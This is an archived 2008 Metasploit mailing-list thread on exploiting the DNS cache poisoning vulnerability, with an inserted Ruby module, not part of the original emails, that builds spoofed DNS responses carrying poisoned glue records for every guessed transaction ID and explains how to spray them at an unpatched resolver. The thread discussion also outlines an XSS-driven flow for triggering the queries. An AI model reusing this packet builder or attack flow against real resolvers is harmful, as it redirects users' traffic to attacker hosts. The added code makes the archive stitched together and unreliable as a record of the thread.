Metasploit mailing list archives

Exploit for the DNS cache poisoning vulnerability...


From: natron at invisibledenizen.org (natron)
Date: Thu, 24 Jul 2008 10:14:33 -0500

Juan, your scenario would be a difficult one to exploit with the current
code.  An external attacker would be able to send spoofed responses to your
DNS server, but would not be able to send requests to the server for
randomAAAAA.domain.com.  An external attacker could, in theory, modify the
request generating side of the msf exploit to use one of the ideas Jarrod
mentioned in the earlier email (e.g. XSS forcing an internal browser to fire
off DNS requests for you), then send the spoofed responses to wherever the
DNS server pops them out.

Something like:

1) XSS kicks off DNS request to attacker-controlled DNS server, telling
attacker the location of the victim's DNS server doing the internet-facing
resolving as well as what port(s) it's using
2) XSS kicks off AAAA.domain.com AAAB.domain.com etc
3) MSF spoofs responses and poisons the cache.

Nathan
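The three steps above, as an added worked example (it is not code from this thread or from the Metasploit module, and it sends nothing on the wire): the Ruby below builds the step 3 packets, one per guessed transaction ID, each carrying a throwaway answer for the random name, an Authority record delegating domain.com to a name server, and an Additional glue record that points that name server at the attacker's address. It then parses the packets back and applies the bailiwick rule a resolver uses when deciding which glue to cache, which is why the glue has to name a host under domain.com rather than an arbitrary name. domain.com, ns1.domain.com, ns1.evil.org, 203.0.113.5, 192.0.2.1 and the DnsPoison module name are made-up assumptions.

```ruby
# Added example (not from the thread or the Metasploit module): builds the
# spoofed responses of step 3 and checks them the way a resolver's bailiwick
# rule does. All names and addresses below are made up; no packets are sent.
module DnsPoison
  TYPE_A   = 1
  TYPE_NS  = 2
  CLASS_IN = 1

  # Dotted name -> DNS wire format (uncompressed labels, terminating zero).
  def self.encode_name(name)
    name.split('.').map { |l| [l.length].pack('C') + l }.join + "\x00".b
  end

  def self.ip_rdata(ip)
    ip.split('.').map(&:to_i).pack('C4')
  end

  # One resource record: NAME TYPE CLASS TTL RDLENGTH RDATA.
  def self.rr(name, type, ttl, rdata)
    encode_name(name) + [type, CLASS_IN, ttl, rdata.bytesize].pack('nnNn') + rdata
  end

  # Step 2 names: AAAAA.domain.com, AAAAB.domain.com, ... are never cached,
  # so each one forces the resolver to send a fresh upstream query.
  def self.random_qname(domain, len = 5)
    Array.new(len) { ('A'..'Z').to_a.sample }.join + '.' + domain
  end

  # Step 3 packet: the answer for the random name is throwaway, the Authority
  # section claims `domain` is served by `ns_name`, and the Additional section
  # glues `ns_name` to `poison_ip`. A resolver vulnerable to this attack caches
  # that glue because ns_name lives inside domain (it is "in bailiwick").
  def self.spoofed_response(txid, qname, domain, ns_name, poison_ip, ttl: 86_400)
    header   = [txid, 0x8500, 1, 1, 1, 1].pack('n6') # QR=1 AA=1 RD=1; qd/an/ns/ar
    question = encode_name(qname) + [TYPE_A, CLASS_IN].pack('nn')
    answer   = rr(qname,   TYPE_A,  ttl, ip_rdata('192.0.2.1')) # made-up address
    auth     = rr(domain,  TYPE_NS, ttl, encode_name(ns_name))
    glue     = rr(ns_name, TYPE_A,  ttl, ip_rdata(poison_ip))
    header + question + answer + auth + glue
  end

  # The attacker does not know the TXID the resolver used, so one response is
  # built per guess; the exploit sprays these at the resolver's source port
  # (learned in step 1) before the real authoritative answer arrives.
  def self.candidates(qname, domain, ns_name, poison_ip, txids)
    txids.map { |id| spoofed_response(id, qname, domain, ns_name, poison_ip) }
  end

  # --- resolver side: parse the packet and apply the bailiwick rule ---

  def self.parse_name(pkt, off)
    labels = []
    loop do
      len = pkt.getbyte(off)
      off += 1
      break if len.zero?
      if (len & 0xC0) == 0xC0                      # compression pointer
        ptr = ((len & 0x3F) << 8) | pkt.getbyte(off)
        return [(labels + [parse_name(pkt, ptr)[0]]).join('.'), off + 1]
      end
      labels << pkt[off, len]
      off += len
    end
    [labels.join('.'), off]
  end

  def self.parse_rr(pkt, off)
    name, off = parse_name(pkt, off)
    type, _klass, ttl, rdlen = pkt[off, 10].unpack('nnNn')
    [{ name: name, type: type, ttl: ttl, rdata: pkt[off + 10, rdlen] }, off + 10 + rdlen]
  end

  def self.parse(pkt)
    txid, flags, _qd, an, ns, ar = pkt[0, 12].unpack('n6')
    qname, off = parse_name(pkt, 12)
    off += 4                                       # skip QTYPE/QCLASS
    answer, authority, additional = [an, ns, ar].map do |count|
      Array.new(count) { rec, off = parse_rr(pkt, off); rec }
    end
    { txid: txid, flags: flags, qname: qname,
      answer: answer, authority: authority, additional: additional }
  end

  def self.in_bailiwick?(owner, zone)
    owner == zone || owner.end_with?('.' + zone)
  end

  # Glue a correct resolver may cache: Additional A records whose owner lies
  # under a zone the Authority section delegates. Out-of-zone glue is dropped.
  def self.accepted_glue(resp)
    zones = resp[:authority].select { |r| r[:type] == TYPE_NS }.map { |r| r[:name] }
    resp[:additional]
      .select { |r| r[:type] == TYPE_A && zones.any? { |z| in_bailiwick?(r[:name], z) } }
      .map { |r| [r[:name], r[:rdata].unpack('C4').join('.')] }
  end
end
```

With a resolver that reuses one source port (the pre-patch behaviour the port discovery in step 1 relies on), candidates(qname, 'domain.com', 'ns1.domain.com', attacker_ip, 0..65535) is the whole spray for one random name; if none of them beat the real answer, step 2 generates the next name and the spray repeats. The browser side of steps 1 and 2 is not shown here.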

2008/7/24 Juan Miguel Paredes <one.miguel at gmail.com>:

Thanks HD.

I'm trying to understand this and get this to work in our lab.

In our environment, we have internet-facing DNS servers.  The only systems
allowed to query the internet-facing DNS servers are internal DNS caching
servers.  All internal users can only query the caching servers.  (sorry,
I'm not a DNS guy so my terminology is wrong, I'm sure).  Attacker can't hit
either the internet-facing DNS server or the caching servers from outside.
An attacker would need to be inside the network to begin with.  No problem
there.  However, the attacker would also be forced to target the caching
servers. Additionally:

1.  The attacker would need to know which internet-facing DNS server the
caching server is working with at the time of the attack (or spoof them
all).
2.  Instead of spoofing the authority as in the msf module, the attacker
would have to spoof the internet-facing DNS servers.

After that, unpatched DNS servers are game.  I'm in the process of modifying
the .rb modules for our environment, but I thought I should ask: am I on the
right track here or am I missing something?

Thanks.


On Wed, Jul 23, 2008 at 11:20 PM, H D Moore <hdm at metasploit.com> wrote:

Woops:
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework






